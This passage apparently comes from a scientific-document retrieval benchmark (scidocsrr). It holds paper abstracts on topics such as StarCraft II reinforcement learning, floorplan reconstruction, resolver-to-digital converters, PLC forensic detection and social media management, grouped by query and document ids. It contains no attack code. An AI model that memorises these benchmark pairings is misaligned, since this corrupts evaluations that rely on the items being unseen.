"text": "StarCraft II poses a grand challenge for reinforcement learning. The main difficulties include huge state space, varying action space, long horizon, etc. In this paper, we investigate a set of techniques of reinforcement learning for the full-length game of StarCraft II. We investigate a hierarchical approach, where the hierarchy involves two levels of abstraction. One is the macro-actions extracted from expert’s demonstration trajectories, which can reduce the action space in an order of magnitude yet remains effective. The other is a two-layer hierarchical architecture, which is modular and easy to scale. We also investigate a curriculum transfer learning approach that trains the agent from the simplest opponent to harder ones. On a 64×64 map and using restrictive units, we train the agent on a single machine with 4 GPUs and 48 CPU threads. We achieve a winning rate of more than 99% against the difficulty level-1 built-in AI. Through the curriculum transfer learning algorithm and a mixture of combat model, we can achieve over 93% winning rate against the most difficult non-cheating built-in AI (level-7) within days. We hope this study could shed some light on the future research of large-scale reinforcement learning.",
"title": ""
},
{
"docid": "d2304dae0f99bf5e5b46d4ceb12c0d69",
"text": "The ultimate goal of this indoor mapping research is to automatically reconstruct a floorplan simply by walking through a house with a smartphone in a pocket. This paper tackles this problem by proposing FloorNet, a novel deep neural architecture. The challenge lies in the processing of RGBD streams spanning a large 3D space. FloorNet effectively processes the data through three neural network branches: 1) PointNet with 3D points, exploiting the 3D information; 2) CNN with a 2D point density image in a top-down view, enhancing the local spatial reasoning; and 3) CNN with RGB images, utilizing the full image information. FloorNet exchanges intermediate features across the branches to exploit the best of all the architectures. We have created a benchmark for floorplan reconstruction by acquiring RGBD video streams for 155 residential houses or apartments with Google Tango phones and annotating complete floorplan information. Our qualitative and quantitative evaluations demonstrate that the fusion of three branches effectively improves the reconstruction quality. We hope that the paper together with the benchmark will be an important step towards solving a challenging vector-graphics reconstruction problem. Code and data are available at https://github.com/art-programmer/FloorNet.",
"title": ""
},
{
"docid": "b64945127e8e8e23d3a5013d3aa7788a",
"text": "The process of extraction of interesting patterns or knowledge from the bulk of data refers to the data mining technique. “It is the process of discovering meaningful, new correlation patterns and trends through non-trivial extraction of implicit, previously unknown information from large amount of data stored in repositories using pattern recognition as well as statistical and mathematical techniques”. Due to the wide deployment of Internet and information technology, storage and processing of data technologies, the ever-growing privacy concern has been a major issue in data mining for information sharing. This gave rise to a new path in research, known as Privacy Preserving Data Mining (PPDM). The literature paper discusses various privacy preserving data mining algorithms and provide a wide analyses for the representative techniques for privacy preserving data mining along with their merits and demerits. The paper describes an overview of some of the well-known PPDM algorithms. Most of the algorithms are usually a modification of a well-known data-mining algorithm along with some privacy preserving techniques. This paper also focuses on the problems and directions for the future research here. The paper finally discusses the comparative analysis of some well-known privacy preservation techniques that are used. This paper is intended to be a summary and an overview of PPDM.",
"title": ""
},
{
"docid": "3a3a2261e1063770a9ccbd0d594aa561",
"text": "This paper describes an advanced care and alert portable telemedical monitor (AMON), a wearable medical monitoring and alert system targeting high-risk cardiac/respiratory patients. The system includes continuous collection and evaluation of multiple vital signs, intelligent multiparameter medical emergency detection, and a cellular connection to a medical center. By integrating the whole system in an unobtrusive, wrist-worn enclosure and applying aggressive low-power design techniques, continuous long-term monitoring can be performed without interfering with the patients' everyday activities and without restricting their mobility. In the first two and a half years of this EU IST sponsored project, the AMON consortium has designed, implemented, and tested the described wrist-worn device, a communication link, and a comprehensive medical center software package. The performance of the system has been validated by a medical study with a set of 33 subjects. The paper describes the main concepts behind the AMON system and presents details of the individual subsystems and solutions as well as the results of the medical validation.",
"title": ""
},
{
"docid": "48d7946228c33ba82f3870e0e08acf0d",
"text": "Trajectory prediction of objects in moving objects databases (MODs) has garnered wide support in a variety of applications and is gradually becoming an active research area. The existing trajectory prediction algorithms focus on discovering frequent moving patterns or simulating the mobility of objects via mathematical models. While these models are useful in certain applications, they fall short in describing the position and behavior of moving objects in a network-constraint environment. Aiming to solve this problem, a hidden Markov model (HMM)-based trajectory prediction algorithm is proposed, called Hidden Markov model-based Trajectory Prediction (HMTP). By analyzing the disadvantages of HMTP, a self-adaptive parameter selection algorithm called HMTP * is proposed, which captures the parameters necessary for real-world scenarios in terms of objects with dynamically changing speed. In addition, a density-based trajectory partition algorithm is introduced, which helps improve the efficiency of prediction. In order to evaluate the effectiveness and efficiency of the proposed algorithms, extensive experiments were conducted, and the experimental results demonstrate that the effect of critical parameters on the prediction accuracy in the proposed paradigm, with regard to HMTP *, can greatly improve the accuracy when compared with HMTP, when subjected to randomly changing speeds. Moreover, it has higher positioning precision than HMTP due to its capability of self-adjustment.",
"title": ""
},
{
"docid": "322d23354a9bf45146e4cb7c733bf2ec",
"text": "In this chapter we consider the problem of automatic facial expression analysis. Our take on this is that the field has reached a point where it needs to move away from considering experiments and applications under in-the-lab conditions, and move towards so-called in-the-wild scenarios. We assume throughout this chapter that the aim is to develop technology that can be deployed in practical applications under unconstrained conditions. While some first efforts in this direction have been reported very recently, it is still unclear what the right path to achieving accurate, informative, robust, and real-time facial expression analysis will be. To illuminate the journey ahead, we first provide in Sec. 1 an overview of the existing theories and specific problem formulations considered within the computer vision community. Then we describe in Sec. 2 the standard algorithmic pipeline which is common to most facial expression analysis algorithms. We include suggestions as to which of the current algorithms and approaches are most suited to the scenario considered. In section 3 we describe our view of the remaining challenges, and the current opportunities within the field. This chapter is thus not intended as a review of different approaches, but rather a selection of what we believe are the most suitable state-of-the-art algorithms, and a selection of exemplars chosen to characterise a specific approach. We review in section 4 some of the exciting opportunities for the application of automatic facial expression analysis to everyday practical problems and current commercial applications being exploited. Section 5 ends the chapter by summarising the major conclusions drawn. Brais Martinez School of Computer Science, Jubilee Campus, Wollaton Road, Nottingham, NG8 1BB e-mail: brais.martinez@nottingham.ac.uk Michel F. Valstar School of Computer Science, Jubilee Campus, Wollaton Road, Nottingham, NG8 1BB e-mail: michel.valstar@nottingham.ac.uk",
"title": ""
},
{
"docid": "1548b993c52505372128332be1b2ddf6",
"text": "This paper presents generalizations of Bayes likelihood-ratio updating rule which facilitate an asynchronous propagation of the impacts of new beliefs and/or new evidence in hierarchically organized inference structures with multi-hypotheses variables. The computational scheme proposed specifies a set of belief parameters, communication messages and updating rules which guarantee that the diffusion of updated beliefs is accomplished in a single pass and complies with the tenets of Bayes calculus.",
"title": ""
}
] | scidocsrr |
ee3cda8a3943497b63779f7f0b034599 | Resolver-to-Digital Converter for Compensation of Amplitude Imbalances using DQ Transformation | [
{
"docid": "94cb308e7b39071db4eda05c5ff16d95",
"text": "A resolver generates a pair of signals proportional to the sine and cosine of the angular position of its shaft. A new low-cost method for converting the amplitudes of these sine/cosine transducer signals into a measure of the input angle without using lookup tables is proposed. The new method takes advantage of the components used to operate the resolver, the excitation (carrier) signal in particular. This is a feedforward method based on comparing the amplitudes of the resolver signals to those of the excitation signal together with another shifted by pi/2. A simple method is then used to estimate the shaft angle through this comparison technique. The poor precision of comparison of the signals around their highly nonlinear peak regions is avoided by using a simple technique that relies only on the alternating pseudolinear segments of the signals. This results in a better overall accuracy of the converter. Beside simplicity of implementation, the proposed scheme offers the advantage of robustness to amplitude fluctuation of the transducer excitation signal.",
"title": ""
},
{
"docid": "c7453c6707e3e5b987531ca0114cfc92",
"text": "The aim of this paper is to present a fully integrated solution for synchronous motor control. The implemented controller is based on Actel Fusion field-programmable gate array (FPGA). The objective of this paper is to evaluate the ability of the proposed fully integrated solution to ensure all the required performances in such applications, particularly in terms of control quality and time/area performances. To this purpose, a current control algorithm of a permanent-magnet synchronous machine has been implemented. This machine is associated with a resolver position sensor. In addition to the current control closed loop, all the necessary motor control tasks are implemented in the same device. The analog-to-digital conversion is ensured by the integrated analog-to-digital converter (ADC), avoiding the use of external converters. The resolver processing unit, which computes the rotor position and speed from the resolver signals, is implemented in the FPGA matrix, avoiding the use of external resolver-to-digital converter (RDC). The sine patterns used for the Park transformation are stored in the integrated flash memory blocks.",
"title": ""
}
] | [
{
"docid": "1f2a8022dc883e33510f5808f7b08972",
"text": "As the need of high quality random number generators is constantly increasing especially for cryptographic algorithms, the development of high throughput randomness generators has to be combined with the development of high performance statistical test suites. Unfortunately the implementations of the most popular batteries of test suites are not focused on efficiency and high performance, do not benefit of the processing power offered by today's multi-core processors and tend to become bottlenecks in the processing of large volumes of data generated by various random number generators. Hence there is a stringent need for providing highly efficient statistical tests and our research efforts and results on improving and parallelizing the TestU01 test suite intend to fill this need. Experimental results show that the parallel version of TestU01 takes full advantage of the system's available processing power, reducing the execution time up to 4 times on the tested multicore systems.",
"title": ""
},
{
"docid": "581ec70f1a056cb344825e66ad203c69",
"text": "A new approach to achieve coalescence and sintering of metallic nanoparticles at room temperature is presented. It was discovered that silver nanoparticles behave as soft particles when they come into contact with oppositely charged polyelectrolytes and undergo a spontaneous coalescence process, even without heating. Utilizing this finding in printing conductive patterns, which are composed of silver nanoparticles, enables achieving high conductivities even at room temperature. Due to the sintering of nanoparticles at room temperature, the formation of conductive patterns on plastic substrates and even on paper is made possible. The resulting high conductivity, 20% of that for bulk silver, enabled fabrication of various devices as demonstrated by inkjet printing of a plastic electroluminescent device.",
"title": ""
},
{
"docid": "1b22c3d5bb44340fcb66a1b44b391d71",
"text": "The contrast in real world scenes is often beyond what consumer cameras can capture. For these situations, High Dynamic Range (HDR) images can be generated by taking multiple exposures of the same scene. When fusing information from different images, however, the slightest change in the scene can generate artifacts which dramatically limit the potential of this solution. We present a technique capable of dealing with a large amount of movement in the scene: we find, in all the available exposures, patches consistent with a reference image previously selected from the stack. We generate the HDR image by averaging the radiance estimates of all such regions and we compensate for camera calibration errors by removing potential seams. We show that our method works even in cases when many moving objects cover large regions of the scene.",
"title": ""
},
{
"docid": "028070222acb092767aadfdd6824d0df",
"text": "The autism spectrum disorders (ASDs) are a group of conditions characterized by impairments in reciprocal social interaction and communication, and the presence of restricted and repetitive behaviours. Individuals with an ASD vary greatly in cognitive development, which can range from above average to intellectual disability. Although ASDs are known to be highly heritable (∼90%), the underlying genetic determinants are still largely unknown. Here we analysed the genome-wide characteristics of rare (<1% frequency) copy number variation in ASD using dense genotyping arrays. When comparing 996 ASD individuals of European ancestry to 1,287 matched controls, cases were found to carry a higher global burden of rare, genic copy number variants (CNVs) (1.19 fold, P = 0.012), especially so for loci previously implicated in either ASD and/or intellectual disability (1.69 fold, P = 3.4 × 10-4). Among the CNVs there were numerous de novo and inherited events, sometimes in combination in a given family, implicating many novel ASD genes such as SHANK2, SYNGAP1, DLGAP2 and the X-linked DDX53–PTCHD1 locus. We also discovered an enrichment of CNVs disrupting functional gene sets involved in cellular proliferation, projection and motility, and GTPase/Ras signalling. Our results reveal many new genetic and functional targets in ASD that may lead to final connected pathways.",
"title": ""
},
{
"docid": "9c3050cca4deeb2d94ae5cff883a2d68",
"text": "High speed, low latency obstacle avoidance is essential for enabling Micro Aerial Vehicles (MAVs) to function in cluttered and dynamic environments. While other systems exist that do high-level mapping and 3D path planning for obstacle avoidance, most of these systems require high-powered CPUs on-board or off-board control from a ground station. We present a novel entirely on-board approach, leveraging a light-weight low power stereo vision system on FPGA. Our approach runs at a frame rate of 60 frames a second on VGA-sized images and minimizes latency between image acquisition and performing reactive maneuvers, allowing MAVs to fly more safely and robustly in complex environments. We also suggest our system as a light-weight safety layer for systems undertaking more complex tasks, like mapping the environment. Finally, we show our algorithm implemented on a lightweight, very computationally constrained platform, and demonstrate obstacle avoidance in a variety of environments.",
"title": ""
},
{
"docid": "a791efe9d0414842f7d82e056beaa96f",
"text": "OBJECTIVE\nTo report the outcomes of 500 robotically assisted laparoscopic radical prostatectomies (RALPs), a minimally invasive alternative for treating prostate cancer.\n\n\nPATIENTS AND METHODS\nIn all, 500 patients had RALP over a 30-month period. A transperitoneal six-port approach was used in each case, with the da Vinci robotic surgical system (Intuitive Surgical, Sunnyvale, CA, USA). Prospective data collection included quality-of-life questionnaires, basic demographics (height, weight and body mass index), prostate specific antigen (PSA) levels, clinical stage and Gleason grade. Variables assessed during RALP were operative duration, estimated blood loss (EBL) and complications, and after RALP were hospital stay, catheter time, pathology, PSA level, return of continence and potency.\n\n\nRESULTS\nThe mean (range) duration of RALP was 130 (51-330) min; all procedures were successful, with no intraoperative transfusions or deaths. The mean EBL was 10-300 mL; 97% of patients were discharged home on the first day after RALP with a mean haematocrit of 36%. The mean duration of catheterization was 6.9 (5-21) days. The positive margin rate was 9.4% for all patients; i.e. 2.5% for T2 tumours, 23% for T3a and 53% for T4. The overall biochemical recurrence free (PSA level<0.1 ng/mL) survival was 95% at mean follow-up of 9.7 months. There was complete continence at 3 and 6 months in 89% and 95% of patients, respectively. At 1 year 78% of patients were potent (with or without the use of oral medications), 15% were not yet able to sustain erections capable of intercourse, and another 7% still required injection therapy.\n\n\nCONCLUSION\nRALP is a safe, feasible and minimally invasive alternative for treating prostate cancer. Our initial experience with the procedure shows promising short-term outcomes.",
"title": ""
},
{
"docid": "e05fd90453c53b7cc41fa3b7c5303386",
"text": "The Resource Description Framework (RDF) represents a main ingredient and data representation format for Linked Data and the Semantic Web. It supports a generic graph-based data model and data representation format for describing things, including their relationships with other things. As the size of RDF datasets is growing fast, RDF data management systems must be able to cope with growing amounts of data. Even though physically handling RDF data using a relational table is possible, querying a giant triple table becomes very expensive because of the multiple nested joins required for answering graph queries. In addition, the heterogeneity of RDF Data poses entirely new challenges to database systems. This article provides a comprehensive study of the state of the art in handling and querying RDF data. In particular, we focus on data storage techniques, indexing strategies, and query execution mechanisms. Moreover, we provide a classification of existing systems and approaches. We also provide an overview of the various benchmarking efforts in this context and discuss some of the open problems in this domain.",
"title": ""
},
{
"docid": "e1d0c07f9886d3258f0c5de9dd372e17",
"text": "strategies and tools must be based on some theory of learning and cognition. Of course, crafting well-articulated views that clearly answer the major epistemological questions of human learning has exercised psychologists and educators for centuries. What is a mind? What does it mean to know something? How is our knowledge represented and manifested? Many educators prefer an eclectic approach, selecting “principles and techniques from the many theoretical perspectives in much the same way we might select international dishes from a smorgasbord, choosing those we like best and ending up with a meal which represents no nationality exclusively and a design technology based on no single theoretical base” (Bednar et al., 1995, p. 100). It is certainly the case that research within collaborative educational learning tools has drawn upon behavioral, cognitive information processing, humanistic, and sociocultural theory, among others, for inspiration and justification. Problems arise, however, when tools developed in the service of one epistemology, say cognitive information processing, are integrated within instructional systems designed to promote learning goals inconsistent with it. When concepts, strategies, and tools are abstracted from the theoretical viewpoint that spawned them, they are too often stripped of meaning and utility. In this chapter, we embed our discussion in learner-centered, constructivist, and sociocultural perspectives on collaborative technology, with a bias toward the third. The principles of these perspectives, in fact, provide the theoretical rationale for much of the research and ideas presented in this book. 2",
"title": ""
},
{
"docid": "d6838b41bfa127f34886322064c83f92",
"text": "The brainstem tegmentum, including the reticular formation, contains distinct nuclei, each of which has a set of chemical, physiological and anatomical features. Damage to the brainstem tegmentum is known to cause coma, the most radical disturbance of consciousness. However, it has remained unclear which nuclei within the tegmentum are crucial for the maintenance of consciousness in humans. Accordingly, we initiated a retrospective study of MRIs obtained from 47 patients with brainstem stroke. The lesion boundaries were charted on patient MRIs and transferred onto a corresponding series of 4.7 T MRIs obtained from a control brainstem specimen that later was cut on a freezing microtome and analysed histologically. In addition, medical charts and available post-mortem materials were used to obtain relevant clinical and anatomical data to verify the MRI readings in each case. We found that in the 38 patients who did not have coma, brainstem damage either was located outside the tegmentum (n = 29) or produced a very small and unilateral compromise of the tegmentum (n = 9). In contrast, in patients who had coma (n = 9), the lesions in the tegmentum were mostly bilateral (n = 7) and were located either in the pons alone (n = 4) or in the upper pons and the midbrain (n = 5). The maximum overlap territory of the lesions coincided with the location of the rostral raphe complex, locus coeruleus, laterodorsal tegmental nucleus, nucleus pontis oralis, parabrachial nucleus and the white matter in between these nuclei. We also found that four coma subjects developed hyperthermia and died in the absence of any infections. In these cases, the maximum lesion overlap was centred in the core of pontine tegmentum. Our findings suggest that lesions confined to the upper pons can cause coma in humans even in the absence of damage to the midbrain. The findings also point to the brainstem nuclei whose lesions are likely to be associated with loss of consciousness and fatal hyperthermia in humans.",
"title": ""
},
{
"docid": "f79b5057cf1bd621f8a3a69efcd5e100",
"text": "A novel, tri-band, planar plate-type antenna made of a compact metal plate for wireless local area network (WLAN) applications in the 2.4GHz (2400–2484MHz), 5.2GHz (5150– 5350MHz), and 5.8 GHz (5725–5825 MHz) bands is presented. The antenna was designed in a way that the operating principle includes dipole and loop resonant modes to cover the 2.4/5.2 and 5.8 GHz bands, respectively. The antenna comprises a larger radiating arm and a smaller loop radiating arm, which are connected to each other at the signal ground point. The antenna can easily be fed by using a 50 Ω mini-coaxial cable and shows good radiation performance. Details of the design are described and discussed in the article.",
"title": ""
},
{
"docid": "ba7d80246069938fbb0e8bc0170f50be",
"text": "Supervisory Control and Data Acquisition (SCADA) system is an industrial control automated system. It is built with multiple Programmable Logic Controllers (PLCs). PLC is a special form of microprocessor-based controller with proprietary operating system. Due to the unique architecture of PLC, traditional digital forensic tools are difficult to be applied. In this paper, we propose a program called Control Program Logic Change Detector (CPLCD), which works with a set of Detection Rules (DRs) to detect and record undesired incidents on interfering normal operations of PLC. In order to prove the feasibility of our solution, we set up two experiments for detecting two common PLC attacks. Moreover, we illustrate how CPLCD and network analyzer Wireshark could work together for performing digital forensic investigation on PLC.",
"title": ""
},
{
"docid": "718cf9a405a81b9a43279a1d02f5e516",
"text": "In cross-cultural psychology, one of the major sources of the development and display of human behavior is the contact between cultural populations. Such intercultural contact results in both cultural and psychological changes. At the cultural level, collective activities and social institutions become altered, and at the psychological level, there are changes in an individual's daily behavioral repertoire and sometimes in experienced stress. The two most common research findings at the individual level are that there are large variations in how people acculturate and in how well they adapt to this process. Variations in ways of acculturating have become known by the terms integration, assimilation, separation, and marginalization. Two variations in adaptation have been identified, involving psychological well-being and sociocultural competence. One important finding is that there are relationships between how individuals acculturate and how well they adapt: Often those who integrate (defined as being engaged in both their heritage culture and in the larger society) are better adapted than those who acculturate by orienting themselves to one or the other culture (by way of assimilation or separation) or to neither culture (marginalization). Implications of these findings for policy and program development and for future research are presented.",
"title": ""
},
{
"docid": "6d291a65658fff5db76df9d9d98855a6",
"text": "This paper gives an overview about different failure mechanisms which limit the safe operating area of power devices. It is demonstrated how the device internal processes can be investigated by means of device simulation. For instance, the electrothermal simulation of high-voltage diode turn-off reveals how a backside filament transforms into a continuous filament connecting the anode and cathode and how this can be accompanied with a transition from avalanche-induced into thermally driven carrier generation. A similar current destabilization may occur during insulated-gate bipolar transistor turn-off with a high turn-off rate, when the channel is closed quickly leading to strong dynamic avalanche. It is explained how the current filamentation depends on substrate resistivity, device thickness, channel width, and switching conditions (gate resistor and overcurrent). Filamentation processes during short-circuit events are discussed, and possible countermeasures are suggested. A mechanism of a periodically emerging and vanishing filament near the edge of the chip is presented. Examples on current destabilizing effects in gate turn-off thyristors, integrated gate-commutated thyristors, and metal-oxide-semiconductor field-effect transistors are given, and limitations of current device simulation are discussed.",
"title": ""
},
{
"docid": "5efb42ac41cbe3283d5791e8177bd86d",
"text": "Past work has documented and described major patterns of adaptive and maladaptive behavior: the mastery.oriented and the helpless patterns. In this article, we present a research-based model that accounts for these patterns in terms of underlying psychological processes. The model specifies how individuals' implicit theories orient them toward particular goals and how these goals set up the different patterns. Indeed, we show how each feature (cognitive, affective, and behavioral) of the adaptive and maladaptive patterns can be seen to follow directly from different goals. We then examine the generality of the model and use it to illuminate phenomena in a wide variety of domains. Finally, we place the model in its broadest context and examine its implications for our understanding of motivational and personality processes.",
"title": ""
},
{
"docid": "a2d38448513e69f514f88eb852e76292",
"text": "It is cost-efficient for a tenant with a limited budget to establish a virtual MapReduce cluster by renting multiple virtual private servers (VPSs) from a VPS provider. To provide an appropriate scheduling scheme for this type of computing environment, we propose in this paper a hybrid job-driven scheduling scheme (JoSS for short) from a tenant's perspective. JoSS provides not only job-level scheduling, but also map-task level scheduling and reduce-task level scheduling. JoSS classifies MapReduce jobs based on job scale and job type and designs an appropriate scheduling policy to schedule each class of jobs. The goal is to improve data locality for both map tasks and reduce tasks, avoid job starvation, and improve job execution performance. Two variations of JoSS are further introduced to separately achieve a better map-data locality and a faster task assignment. We conduct extensive experiments to evaluate and compare the two variations with current scheduling algorithms supported by Hadoop. The results show that the two variations outperform the other tested algorithms in terms of map-data locality, reduce-data locality, and network overhead without incurring significant overhead. In addition, the two variations are separately suitable for different MapReduce-workload scenarios and provide the best job performance among all tested algorithms.",
"title": ""
},
{
"docid": "80ccbda4de8a765111ad8994f2ac9e95",
"text": "Smart grid, smart metering, electromobility, and the regulation of the power network are keywords of the transition in energy politics. In the future, the power grid will be smart. Based on different works, this article presents a data collection, analyzing, and monitoring software for a reference smart grid. We discuss two possible architectures for collecting data from energy analyzers and analyze their performance with respect to real-time monitoring, load peak analysis, and automated regulation of the power grid. In the first architecture, we analyze the latency, needed bandwidth, and scalability for collecting data over the Modbus TCP/IP protocol and in the second one over a RESTful web service. The analysis results show that the solution with Modbus is more scalable as the one with RESTful web service. However, the performance and scalability of both architectures are sufficient for our reference smart grid and",
"title": ""
},
{
"docid": "1121e6d94c1e545e0fa8b0d8b0ef5997",
"text": "Research is a continuous phenomenon. It is recursive in nature. Every research is based on some earlier research outcome. A general approach in reviewing the literature for a problem is to categorize earlier work for the same problem as positive and negative citations. In this paper, we propose a novel automated technique, which classifies whether an earlier work is cited as sentiment positive or sentiment negative. Our approach first extracted the portion of the cited text from citing paper. Using a sentiment lexicon we classify the citation as positive or negative by picking a window of at most five (5) sentences around the cited place (corpus). We have used Naïve-Bayes Classifier for sentiment analysis. The algorithm is evaluated on a manually annotated and class labelled collection of 150 research papers from the domain of computer science. Our preliminary results show an accuracy of 80%. We assert that our approach can be generalized to classification of scientific research papers in different disciplines.",
"title": ""
},
{
"docid": "73f5e4d9011ce7115fd7ff0be5974a14",
"text": "In this work we present, apply, and evaluate a novel, interactive visualization model for comparative analysis of structural variants and rearrangements in human and cancer genomes, with emphasis on data integration and uncertainty visualization. To support both global trend analysis and local feature detection, this model enables explorations continuously scaled from the high-level, complete genome perspective, down to the low-level, structural rearrangement view, while preserving global context at all times. We have implemented these techniques in Gremlin, a genomic rearrangement explorer with multi-scale, linked interactions, which we apply to four human cancer genome data sets for evaluation. Using an insight-based evaluation methodology, we compare Gremlin to Circos, the state-of-the-art in genomic rearrangement visualization, through a small user study with computational biologists working in rearrangement analysis. Results from user study evaluations demonstrate that this visualization model enables more total insights, more insights per minute, and more complex insights than the current state-of-the-art for visual analysis and exploration of genome rearrangements.",
"title": ""
},
{
"docid": "ecf56a68fbd1df54b83251b9dfc6bf9f",
"text": "All our lives, we interact with the space around us, whether we are finding our way to a remote cabana in an exotic tropical isle or reaching for a ripe mango on the tree beside the cabana or finding a comfortable position in the hammock to snack after the journey. Each of these natural situations is experienced differently, and as a consequence, each is conceptualized differently. Our knowledge of space, unlike geometry or physical measurements of space, is constructed out of the things in space, not space itself. Mental spaces are schematized, eliminating detail and simplifying features around a framework consisting of elements and the relations among them. Our research suggests that which elements and spatial relations are included and how they are schematized varies with the space in ways that reflect our experience in the space. The space of navigation is too large to be seen from a single place (short of flying over it, but that is a different experience). To find our way in a large environment requires putting together information from different views or different sources. For the most part, the space of navigation is conceptualized as a two-dimensional plane, like a map. Maps, too, are schematized, yet they differ in significant ways from mental representations of space. The space around the body stands in contrast to the space of navigation. It can be seen from a single place, given rotation in place. It is the space of immediate action, our own or the things around us. It is also conceptualized schematically, but in three dimensions. Finally, there is the space of our own bodies. This space is the space of our own actions and our own sensations, experienced from the inside as well as the outside. It is schematized in terms of our limbs. Knowledge of these three spaces, that is, knowledge of the relative locations of the places in navigation space that are critical to our lives, knowledge of the space we are currently interacting with, and knowledge of the space of our bodies, is essential to finding our way in the world, to fulfilling our needs, and to avoiding danger, in short, necessary to survival.",
"title": ""
},
{
"docid": "8b0278400c9576c4a3a77a4ec742809c",
"text": "Storyline detection aims to connect seemly irrelevant single documents into meaningful chains, which provides opportunities for understanding how events evolve over time and what triggers such evolutions. Most previous work generated the storylines through unsupervised methods that can hardly reveal underlying factors driving the evolution process. This paper introduces a Bayesian model to generate storylines from massive documents and infer the corresponding hidden relations and topics. In addition, our model is the first attempt that utilizes Twitter data as human input to ``supervise'' the generation of storylines. Through extensive experiments, we demonstrate our proposed model can achieve significant improvement over baseline methods and can be used to discover interesting patterns for real world cases.",
"title": ""
}
] | scidocsrr |
3eb8279416c873d54f080d56bf105bd7 | Active Social Media Management: The Case of Health Care | [
{
"docid": "3eee111e4521528031019f83786efab7",
"text": "Social media platforms such as Twitter and Facebook enable the creation of virtual customer environments (VCEs) where online communities of interest form around specific firms, brands, or products. While these platforms can be used as another means to deliver familiar e-commerce applications, when firms fail to fully engage their customers, they also fail to fully exploit the capabilities of social media platforms. To gain business value, organizations need to incorporate community building as part of the implementation of social media.",
"title": ""
},
{
"docid": "6a27457b4d8efea03475f4d276a704c9",
"text": "Why are certain pieces of online content more viral than others? This article takes a psychological approach to understanding diffusion. Using a unique dataset of all the New York Times articles published over a three month period, the authors examine how emotion shapes virality. Results indicate that positive content is more viral than negative content, but that the relationship between emotion and social transmission is more complex than valence alone. Virality is driven, in part, by physiological arousal. Content that evokes high-arousal positive (awe) or negative (anger or anxiety) emotions is more viral. Content that evokes low arousal, or deactivating emotions (e.g., sadness) is less viral. These results hold even controlling for how surprising, interesting, or practically useful content is (all of which are positively linked to virality), as well as external drivers of attention (e.g., how prominently content was featured). Experimental results further demonstrate the causal impact of specific emotion on transmission, and illustrate that it is driven by the level of activation induced. Taken together, these findings shed light on why people share content and provide insight into designing effective viral marketing",
"title": ""
},
{
"docid": "572348e4389acd63ea7c0667e87bbe04",
"text": "Through the analysis of collective upvotes and downvotes in multiple social media, we discover the bimodal regime of collective evaluations. When online content surpasses the local social context by reaching a threshold of collective attention, negativity grows faster with positivity, which serves as a trace of the burst of a filter bubble. To attain a global audience, we show that emotions expressed in online content has a significant effect and also play a key role in creating polarized opinions.",
"title": ""
}
] | [
{
"docid": "0b6ac11cb84a573e55cb75f0bc342d72",
"text": "This paper develops and tests algorithms for predicting the end-to-end route of a vehicle based on GPS observations of the vehicle’s past trips. We show that a large portion of a typical driver’s trips are repeated. Our algorithms exploit this fact for prediction by matching the first part of a driver’s current trip with one of the set of previously observed trips. Rather than predicting upcoming road segments, our focus is on making long term predictions of the route. We evaluate our algorithms using a large corpus of real world GPS driving data acquired from observing over 250 drivers for an average of 15.1 days per subject. Our results show how often and how accurately we can predict a driver’s route as a function of the distance already driven.",
"title": ""
},
{
"docid": "afe24ba1c3f3423719a98e1a69a3dc70",
"text": "This brief presents a nonisolated multilevel linear amplifier with nonlinear component (LINC) power amplifier (PA) implemented in a standard 0.18-μm complementary metal-oxide- semiconductor process. Using a nonisolated power combiner, the overall power efficiency is increased by reducing the wasted power at the combined out-phased signal; however, the efficiency at low power still needs to be improved. To further improve the efficiency of the low-power (LP) mode, we propose a multiple-output power-level LINC PA, with load modulation implemented by switches. In addition, analysis of the proposed design on the system level as well as the circuit level was performed to optimize its performance. The measurement results demonstrate that the proposed technique maintains more than 45% power-added efficiency (PAE) for peak power at 21 dB for the high-power mode and 17 dBm for the LP mode at 600 MHz. The PAE for a 6-dB peak-to-average ratio orthogonal frequency-division multiplexing modulated signal is higher than 24% PAE in both power modes. To the authors' knowledge, the proposed output-phasing PA is the first implemented multilevel LINC PA that uses quarter-wave lines without multiple power supply sources.",
"title": ""
},
{
"docid": "af598c452d9a6589e45abe702c7cab58",
"text": "This paper proposes the concept of “liveaction virtual reality games” as a new genre of digital games based on an innovative combination of live-action, mixed-reality, context-awareness, and interaction paradigms that comprise tangible objects, context-aware input devices, and embedded/embodied interactions. Live-action virtual reality games are “live-action games” because a player physically acts out (using his/her real body and senses) his/her “avatar” (his/her virtual representation) in the game stage – the mixed-reality environment where the game happens. The game stage is a kind of “augmented virtuality” – a mixedreality where the virtual world is augmented with real-world information. In live-action virtual reality games, players wear HMD devices and see a virtual world that is constructed using the physical world architecture as the basic geometry and context information. Physical objects that reside in the physical world are also mapped to virtual elements. Liveaction virtual reality games keeps the virtual and real-worlds superimposed, requiring players to physically move in the environment and to use different interaction paradigms (such as tangible and embodied interaction) to complete game activities. This setup enables the players to touch physical architectural elements (such as walls) and other objects, “feeling” the game stage. Players have free movement and may interact with physical objects placed in the game stage, implicitly and explicitly. Live-action virtual reality games differ from similar game concepts because they sense and use contextual information to create unpredictable game experiences, giving rise to emergent gameplay.",
"title": ""
},
{
"docid": "6e8d1e237cf7a247e9f51266af306f09",
"text": "Regional morphometic analyses of the corpus callosum (CC) are typically done using the 2D medial section of the structure, but the shape information is lost through this method. Here we perform 3D regional group comparisons of the surface anatomy of the CC between 12 preterm and 11 term-born neonates. We reconstruct CC surfaces from manually segmented brain MRI and build parametric meshes on the surfaces by computing surface conformal parameterizations with holomorphic 1-forms. Surfaces are registered by constrained harmonic maps on the parametric domains and statistical comparisons between the two groups are performed via multivariate tensor-based morphometry (mTBM). We detect statistically significant morphological changes in the genu and the splenium. Our mTBM analysis is compared to the medial axis distance [13], and to a usual 2D analysis.",
"title": ""
},
{
"docid": "28b824d73a1efb48ee5628ac461d925e",
"text": "Automatic assessment of sentiment from visual content has gained considerable attention with the increasing tendency of expressing opinions on-line. In this paper, we solve the problem of visual sentiment analysis using the high-level abstraction in the recognition process. Existing methods based on convolutional neural networks learn sentiment representations from the holistic image appearance. However, different image regions can have a different influence on the intended expression. This paper presents a weakly supervised coupled convolutional network with two branches to leverage the localized information. The first branch detects a sentiment specific soft map by training a fully convolutional network with the cross spatial pooling strategy, which only requires image-level labels, thereby significantly reducing the annotation burden. The second branch utilizes both the holistic and localized information by coupling the sentiment map with deep features for robust classification. We integrate the sentiment detection and classification branches into a unified deep framework and optimize the network in an end-to-end manner. Extensive experiments on six benchmark datasets demonstrate that the proposed method performs favorably against the state-of-the-art methods for visual sentiment analysis.",
"title": ""
},
{
"docid": "0cbadd52e253c04d95558115a8eec9e4",
